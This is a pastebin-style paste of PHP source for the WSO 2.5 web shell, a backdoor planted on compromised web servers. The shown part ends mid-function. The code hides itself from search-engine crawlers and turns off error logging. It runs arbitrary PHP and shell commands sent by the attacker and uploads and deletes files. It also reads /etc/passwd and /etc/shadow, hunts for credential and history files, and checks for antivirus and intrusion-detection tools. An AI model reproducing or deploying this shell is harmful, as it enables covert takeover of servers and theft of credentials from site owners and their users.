· 10 years ago · Jul 27, 2016, 05:24 AM
1<?php
2$auth_pass = "68c5013474b5765a2cdf4c2dc45e73db";
3$color = "#df5";
4$default_action = 'FilesMan';
5$default_use_ajax = true;
6$default_charset = 'Windows-1251';
7
8if (!empty($_SERVER['HTTP_USER_AGENT']))
9 {
10 $userAgents = array(
11 "Google",
12 "Slurp",
13 "MSNBot",
14 "ia_archiver",
15 "Yandex",
16 "Rambler"
17 );
18 if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
19 {
20 header('HTTP/1.0 404 Not Found');
21 exit;
22 }
23 }
24
25@ini_set('error_log', NULL);
26@ini_set('log_errors', 0);
27@ini_set('max_execution_time', 0);
28@set_time_limit(0);
29@set_magic_quotes_runtime(0);
30@define('WSO_VERSION', '2.5');
31
32if (get_magic_quotes_gpc())
33 {
34 function WSOstripslashes($array)
35 {
36 return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
37 }
38
39 $_POST = WSOstripslashes($_POST);
40 $_COOKIE = WSOstripslashes($_COOKIE);
41 }
42
43function wsoLogin()
44 {
45 die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
46 }
47
48function WSOsetcookie($k, $v)
49 {
50 $_COOKIE[$k] = $v;
51 setcookie($k, $v);
52 }
53
54if (!empty($auth_pass))
55 {
56 if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']) , $auth_pass);
57 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || ($_COOKIE[md5($_SERVER['HTTP_HOST']) ] != $auth_pass)) wsoLogin();
58 }
59
60if (strtolower(substr(PHP_OS, 0, 3)) == "win") $os = 'win';
61 else $os = 'nix';
62$safe_mode = @ini_get('safe_mode');
63
64if (!$safe_mode) error_reporting(0);
65$disable_functions = @ini_get('disable_functions');
66$home_cwd = @getcwd();
67
68if (isset($_POST['c'])) @chdir($_POST['c']);
69$cwd = @getcwd();
70
71if ($os == 'win')
72 {
73 $home_cwd = str_replace("\\", "/", $home_cwd);
74 $cwd = str_replace("\\", "/", $cwd);
75 }
76
77if ($cwd[strlen($cwd) - 1] != '/') $cwd.= '/';
78
79if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
80
81if ($os == 'win') $aliases = array(
82 "List Directory" => "dir",
83 "Find index.php in current dir" => "dir /s /w /b index.php",
84 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
85 "Show active connections" => "netstat -an",
86 "Show running services" => "net start",
87 "User accounts" => "net user",
88 "Show computers" => "net view",
89 "ARP Table" => "arp -a",
90 "IP Configuration" => "ipconfig /all"
91);
92 else $aliases = array(
93 "List dir" => "ls -lha",
94 "list file attributes on a Linux second extended file system" => "lsattr -va",
95 "show opened ports" => "netstat -an | grep -i listen",
96 "process status" => "ps aux",
97 "Find" => "",
98 "find all suid files" => "find / -type f -perm -04000 -ls",
99 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
100 "find all sgid files" => "find / -type f -perm -02000 -ls",
101 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
102 "find config.inc.php files" => "find / -type f -name config.inc.php",
103 "find config* files" => "find / -type f -name \"config*\"",
104 "find config* files in current dir" => "find . -type f -name \"config*\"",
105 "find all writable folders and files" => "find / -perm -2 -ls",
106 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
107 "find all service.pwd files" => "find / -type f -name service.pwd",
108 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
109 "find all .htpasswd files" => "find / -type f -name .htpasswd",
110 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
111 "find all .bash_history files" => "find / -type f -name .bash_history",
112 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
113 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
114 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
115 "Locate" => "",
116 "locate httpd.conf files" => "locate httpd.conf",
117 "locate vhosts.conf files" => "locate vhosts.conf",
118 "locate proftpd.conf files" => "locate proftpd.conf",
119 "locate psybnc.conf files" => "locate psybnc.conf",
120 "locate my.conf files" => "locate my.conf",
121 "locate admin.php files" => "locate admin.php",
122 "locate cfg.php files" => "locate cfg.php",
123 "locate conf.php files" => "locate conf.php",
124 "locate config.dat files" => "locate config.dat",
125 "locate config.php files" => "locate config.php",
126 "locate config.inc files" => "locate config.inc",
127 "locate config.inc.php" => "locate config.inc.php",
128 "locate config.default.php files" => "locate config.default.php",
129 "locate config* files " => "locate config",
130 "locate .conf files" => "locate '.conf'",
131 "locate .pwd files" => "locate '.pwd'",
132 "locate .sql files" => "locate '.sql'",
133 "locate .htpasswd files" => "locate '.htpasswd'",
134 "locate .bash_history files" => "locate '.bash_history'",
135 "locate .mysql_history files" => "locate '.mysql_history'",
136 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
137 "locate backup files" => "locate backup",
138 "locate dump files" => "locate dump",
139 "locate priv files" => "locate priv"
140);
141
142function wsoHeader()
143 {
144 if (empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset'];
145 global $color;
146 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: $color !important; } span{ font-weight: bolder; } h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; var a_ = '" . htmlspecialchars(@$_POST['a']) . "' var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "'; var p1_ = '" . ((strpos(@$_POST['p1'], "\n") !== false) ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "'; var p2_ = '" . ((strpos(@$_POST['p2'], "\n") !== false) ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "'; var p3_ = '" . ((strpos(@$_POST['p3'], "\n") !== false) ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "'; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form>";
147 $freeSpace = @diskfreespace($GLOBALS['cwd']);
148 $totalSpace = @disk_total_space($GLOBALS['cwd']);
149 $totalSpace = $totalSpace ? $totalSpace : 1;
150 $release = @php_uname('r');
151 $kernel = @php_uname('s');
152 $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
153 if (strpos('Linux', $kernel) !== false) $explink.= urlencode('Linux Kernel ' . substr($release, 0, 6));
154 else $explink.= urlencode($kernel . ' ' . substr($release, 0, 3));
155 if (!function_exists('posix_getegid'))
156 {
157 $user = @get_current_user();
158 $uid = @getmyuid();
159 $gid = @getmygid();
160 $group = "?";
161 }
162 else
163 {
164 $uid = @posix_getpwuid(posix_geteuid());
165 $gid = @posix_getgrgid(posix_getegid());
166 $user = $uid['name'];
167 $uid = $uid['uid'];
168 $group = $gid['name'];
169 $gid = $gid['gid'];
170 }
171
172 $cwd_links = '';
173 $path = explode("/", $GLOBALS['cwd']);
174 $n = count($path);
175 for ($i = 0; $i < $n - 1; $i++)
176 {
177 $cwd_links.= "<a href='#' onclick='g(\"FilesMan\",\"";
178 for ($j = 0; $j <= $i; $j++) $cwd_links.= $path[$j] . '/';
179 $cwd_links.= "\")'>" . $path[$i] . "/</a>";
180 }
181
182 $charsets = array(
183 'UTF-8',
184 'Windows-1251',
185 'KOI8-R',
186 'KOI8-U',
187 'cp866'
188 );
189 $opt_charsets = '';
190 foreach($charsets as $item) $opt_charsets.= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
191 $m = array(
192 'Sec. Info' => 'SecInfo',
193 'Files' => 'FilesMan',
194 'Console' => 'Console',
195 'Sql' => 'Sql',
196 'Php' => 'Php',
197 'String tools' => 'StringTools',
198 'Bruteforce' => 'Bruteforce',
199 'Network' => 'Network'
200 );
201 if (!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout';
202 $m['Self remove'] = 'SelfRemove';
203 $menu = '';
204 foreach($m as $k => $v) $menu.= '<th width="' . (int)(100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
205 $drives = "";
206 if ($GLOBALS['os'] == 'win')
207 {
208 foreach(range('c', 'z') as $drive)
209 if (is_dir($drive . ':\\')) $drives.= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> ';
210 }
211
212 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br />User:<br />Php:<br />Hdd:<br />Cwd:' . ($GLOBALS['os'] == 'win' ? '<br />Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname() , 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br />' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br />' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br />' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' (' . (int)($freeSpace / $totalSpace * 100) . '%)<br />' . $cwd_links . ' ' . wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br />' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br /><span>Server IP:</span><br />' . @$_SERVER["SERVER_ADDR"] . '<br /><span>Client IP:</span><br />' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
213 }
214
215function wsoFooter()
216 {
217 $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>";
218 echo " </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br /><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td> <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br /><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br /><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br /><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br /><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='" . $GLOBALS['cwd'] . "'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'> <span>Upload file:</span>$is_writable<br /><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>";
219 }
220
221if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false))
222 {
223 function posix_getpwuid($p)
224 {
225 return false;
226 }
227 }
228
229if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false))
230 {
231 function posix_getgrgid($p)
232 {
233 return false;
234 }
235 }
236
237function wsoEx($in)
238 {
239 $out = '';
240 if (function_exists('exec'))
241 {
242 @exec($in, $out);
243 $out = @join("\n", $out);
244 }
245 elseif (function_exists('passthru'))
246 {
247 ob_start();
248 @passthru($in);
249 $out = ob_get_clean();
250 }
251 elseif (function_exists('system'))
252 {
253 ob_start();
254 @system($in);
255 $out = ob_get_clean();
256 }
257 elseif (function_exists('shell_exec'))
258 {
259 $out = shell_exec($in);
260 }
261 elseif (is_resource($f = @popen($in, "r")))
262 {
263 $out = "";
264 while (!@feof($f)) $out.= fread($f, 1024);
265 pclose($f);
266 }
267
268 return $out;
269 }
270
271function wsoViewSize($s)
272 {
273 if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB';
274 elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB';
275 elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB';
276 else return $s . ' B';
277 }
278
279function wsoPerms($p)
280 {
281 if (($p & 0xC000) == 0xC000) $i = 's';
282 elseif (($p & 0xA000) == 0xA000) $i = 'l';
283 elseif (($p & 0x8000) == 0x8000) $i = '-';
284 elseif (($p & 0x6000) == 0x6000) $i = 'b';
285 elseif (($p & 0x4000) == 0x4000) $i = 'd';
286 elseif (($p & 0x2000) == 0x2000) $i = 'c';
287 elseif (($p & 0x1000) == 0x1000) $i = 'p';
288 else $i = 'u';
289 $i.= (($p & 0x0100) ? 'r' : '-');
290 $i.= (($p & 0x0080) ? 'w' : '-');
291 $i.= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
292 $i.= (($p & 0x0020) ? 'r' : '-');
293 $i.= (($p & 0x0010) ? 'w' : '-');
294 $i.= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
295 $i.= (($p & 0x0004) ? 'r' : '-');
296 $i.= (($p & 0x0002) ? 'w' : '-');
297 $i.= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
298 return $i;
299 }
300
301function wsoPermsColor($f)
302 {
303 if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
304 elseif (!@is_writable($f)) return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
305 else return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
306 }
307
308function wsoScandir($dir)
309 {
310 if (function_exists("scandir"))
311 {
312 return scandir($dir);
313 }
314 else
315 {
316 $dh = opendir($dir);
317 while (false !== ($filename = readdir($dh))) $files[] = $filename;
318 return $files;
319 }
320 }
321
322function wsoWhich($p)
323 {
324 $path = wsoEx('which ' . $p);
325 if (!empty($path)) return $path;
326 return false;
327 }
328
329function actionSecInfo()
330 {
331 wsoHeader();
332 echo '<h1>Server security information</h1><div class=content>';
333 function wsoSecParam($n, $v)
334 {
335 $v = trim($v);
336 if ($v)
337 {
338 echo '<span>' . $n . ': </span>';
339 if (strpos($v, "\n") === false) echo $v . '<br />';
340 else echo '<pre class=ml1>' . $v . '</pre>';
341 }
342 }
343
344 wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
345 if (function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
346 wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
347 wsoSecParam('Open base dir', @ini_get('open_basedir'));
348 wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
349 wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
350 wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
351 $temp = array();
352 if (function_exists('mysql_get_client_info')) $temp[] = "MySql (" . mysql_get_client_info() . ")";
353 if (function_exists('mssql_connect')) $temp[] = "MSSQL";
354 if (function_exists('pg_connect')) $temp[] = "PostgreSQL";
355 if (function_exists('oci_connect')) $temp[] = "Oracle";
356 wsoSecParam('Supported databases', implode(', ', $temp));
357 echo '<br />';
358 if ($GLOBALS['os'] == 'nix')
359 {
360 wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no');
361 wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no');
362 wsoSecParam('OS version', @file_get_contents('/proc/version'));
363 wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
364 if (!$GLOBALS['safe_mode'])
365 {
366 $userful = array(
367 'gcc',
368 'lcc',
369 'cc',
370 'ld',
371 'make',
372 'php',
373 'perl',
374 'python',
375 'ruby',
376 'tar',
377 'gzip',
378 'bzip',
379 'bzip2',
380 'nc',
381 'locate',
382 'suidperl'
383 );
384 $danger = array(
385 'kav',
386 'nod32',
387 'bdcored',
388 'uvscan',
389 'sav',
390 'drwebd',
391 'clamd',
392 'rkhunter',
393 'chkrootkit',
394 'iptables',
395 'ipfw',
396 'tripwire',
397 'shieldcc',
398 'portsentry',
399 'snort',
400 'ossec',
401 'lidsadm',
402 'tcplodg',
403 'sxid',
404 'logcheck',
405 'logwatch',
406 'sysmask',
407 'zmbscap',
408 'sawmill',
409 'wormscan',
410 'ninja'
411 );
412 $downloaders = array(
413 'wget',
414 'fetch',
415 'lynx',
416 'links',
417 'curl',
418 'get',
419 'lwp-mirror'
420 );
421 echo '<br />';
422 $temp = array();
423 foreach($userful as $item)
424 if (wsoWhich($item)) $temp[] = $item;
425 wsoSecParam('Userful', implode(', ', $temp));
426 $temp = array();
427 foreach($danger as $item)
428 if (wsoWhich($item)) $temp[] = $item;
429 wsoSecParam('Danger', implode(', ', $temp));
430 $temp = array();
431 foreach($downloaders as $item)
432 if (wsoWhich($item)) $temp[] = $item;
433 wsoSecParam('Downloaders', implode(', ', $temp));
434 echo '<br/>';
435 wsoSecParam('HDD space', wsoEx('df -h'));
436 wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
437 echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
438 if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3']))
439 {
440 $temp = "";
441 for (; $_POST['p2'] <= $_POST['p3']; $_POST['p2']++)
442 {
443 $uid = @posix_getpwuid($_POST['p2']);
444 if ($uid) $temp.= join(':', $uid) . "\n";
445 }
446
447 echo '<br/>';
448 wsoSecParam('Users', $temp);
449 }
450 }
451 }
452 else
453 {
454 wsoSecParam('OS Version', wsoEx('ver'));
455 wsoSecParam('Account Settings', wsoEx('net accounts'));
456 wsoSecParam('User Accounts', wsoEx('net user'));
457 }
458
459 echo '</div>';
460 wsoFooter();
461 }
462
463function actionPhp()
464 {
465 if (isset($_POST['ajax']))
466 {
467 WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
468 ob_start();
469 eval($_POST['p1']);
470 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()) , "\n\r\t\\'\0") . "';\n";
471 echo strlen($temp) , "\n", $temp;
472 exit;
473 }
474
475 if (empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
476 wsoHeader();
477 if (isset($_POST['p2']) && ($_POST['p2'] == 'info'))
478 {
479 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
480 ob_start();
481 phpinfo();
482 $tmp = ob_get_clean();
483 $tmp = preg_replace(array(
484 '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
485 '!td, th {(.*)}!msiU',
486 '!<img[^>]+>!msiU',
487 ) , array(
488 '',
489 '.e, .v, .h, .h th {$1}',
490 ''
491 ) , $tmp);
492 echo str_replace('<h1', '<h2', $tmp) . '</div><br />';
493 }
494
495 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">';
496 echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>';
497 if (!empty($_POST['p1']))
498 {
499 ob_start();
500 eval($_POST['p1']);
501 echo htmlspecialchars(ob_get_clean());
502 }
503
504 echo '</pre></div>';
505 wsoFooter();
506 }
507
508function actionFilesMan()
509 {
510 if (!empty($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
511 if (!empty($_POST['p1']))
512 {
513 switch ($_POST['p1'])
514 {
515 case 'uploadFile':
516 if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!";
517 break;
518
519 case 'mkdir':
520 if (!@mkdir($_POST['p2'])) echo "Can't create new dir";
521 break;
522
523 case 'delete':
524 function deleteDir($path)
525 {
526 $path = (substr($path, -1) == '/') ? $path : $path . '/';
527 $dh = opendir($path);
528 while (($item = readdir($dh)) !== false)
529 {
530 $item = $path . $item;
531 if ((basename($item) == "..") || (basename($item) == ".")) continue;
532 $type = filetype($item);
533 if ($type == "dir") deleteDir($item);
534 else @unlink($item);
535 }
536
537 closedir($dh);
538 @rmdir($path);
539 }
540
541 if (is_array(@$_POST['f']))
542 foreach($_POST['f'] as $f)
543 {
544 if ($f == '..') continue;
545 $f = urldecode($f);
546 if (is_dir($f)) deleteDir($f);
547 else @unlink($f);
548 }
549
550 break;
551
552 case 'paste':
553 if ($_COOKIE['act'] == 'copy')
554 {
555 function copy_paste($c, $s, $d)
556 {
557 if (is_dir($c . $s))
558 {
559 mkdir($d . $s);
560 $h = @opendir($c . $s);
561 while (($f = @readdir($h)) !== false)
562 if (($f != ".") and ($f != "..")) copy_paste($c . $s . '/', $f, $d . $s . '/');
563 }
564 elseif (is_file($c . $s)) @copy($c . $s, $d . $s);
565 }
566
567 foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']);
568 }
569 elseif ($_COOKIE['act'] == 'move')
570 {
571 function move_paste($c, $s, $d)
572 {
573 if (is_dir($c . $s))
574 {
575 mkdir($d . $s);
576 $h = @opendir($c . $s);
577 while (($f = @readdir($h)) !== false)
578 if (($f != ".") and ($f != "..")) copy_paste($c . $s . '/', $f, $d . $s . '/');
579 }
580 elseif (@is_file($c . $s)) @copy($c . $s, $d . $s);
581 }
582
583 foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f);
584 }
585 elseif ($_COOKIE['act'] == 'zip')
586 {
587 if (class_exists('ZipArchive'))
588 {
589 $zip = new ZipArchive();
590 if ($zip->open($_POST['p2'], 1))
591 {
592 chdir($_COOKIE['c']);
593 foreach($_COOKIE['f'] as $f)
594 {
595 if ($f == '..') continue;
596 if (@is_file($_COOKIE['c'] . $f)) $zip->addFile($_COOKIE['c'] . $f, $f);
597 elseif (@is_dir($_COOKIE['c'] . $f))
598 {
599 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/'));
600 foreach($iterator as $key => $value)
601 {
602 $zip->addFile(realpath($key) , $key);
603 }
604 }
605 }
606
607 chdir($GLOBALS['cwd']);
608 $zip->close();
609 }
610 }
611 }
612 elseif ($_COOKIE['act'] == 'unzip')
613 {
614 if (class_exists('ZipArchive'))
615 {
616 $zip = new ZipArchive();
617 foreach($_COOKIE['f'] as $f)
618 {
619 if ($zip->open($_COOKIE['c'] . $f))
620 {
621 $zip->extractTo($GLOBALS['cwd']);
622 $zip->close();
623 }
624 }
625 }
626 }
627 elseif ($_COOKIE['act'] == 'tar')
628 {
629 chdir($_COOKIE['c']);
630 $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
631 wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
632 chdir($GLOBALS['cwd']);
633 }
634
635 unset($_COOKIE['f']);
636 setcookie('f', '', time() - 3600);
637 break;
638
639 default:
640 if (!empty($_POST['p1']))
641 {
642 WSOsetcookie('act', $_POST['p1']);
643 WSOsetcookie('f', serialize(@$_POST['f']));
644 WSOsetcookie('c', @$_POST['c']);
645 }
646
647 break;
648 }
649 }
650
651 wsoHeader();
652 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
653 $dirContent = wsoScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']);
654 if ($dirContent === false)
655 {
656 echo 'Can\'t open this folder!';
657 wsoFooter();
658 return;
659 }
660
661 global $sort;
662 $sort = array(
663 'name',
664 1
665 );
666 if (!empty($_POST['p1']))
667 {
668 if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array(
669 $match[1],
670 (int)$match[2]
671 );
672 }
673
674 echo "<script> function sa() { for(i=0;i<d.files.elements.length;i++) if(d.files.elements[i].type == 'checkbox') d.files.elements[i].checked = d.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>";
675 $dirs = $files = array();
676 $n = count($dirContent);
677 for ($i = 0; $i < $n; $i++)
678 {
679 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
680 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
681 $tmp = array(
682 'name' => $dirContent[$i],
683 'path' => $GLOBALS['cwd'] . $dirContent[$i],
684 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])) ,
685 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]) ,
686 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]) ,
687 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]) ,
688 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])
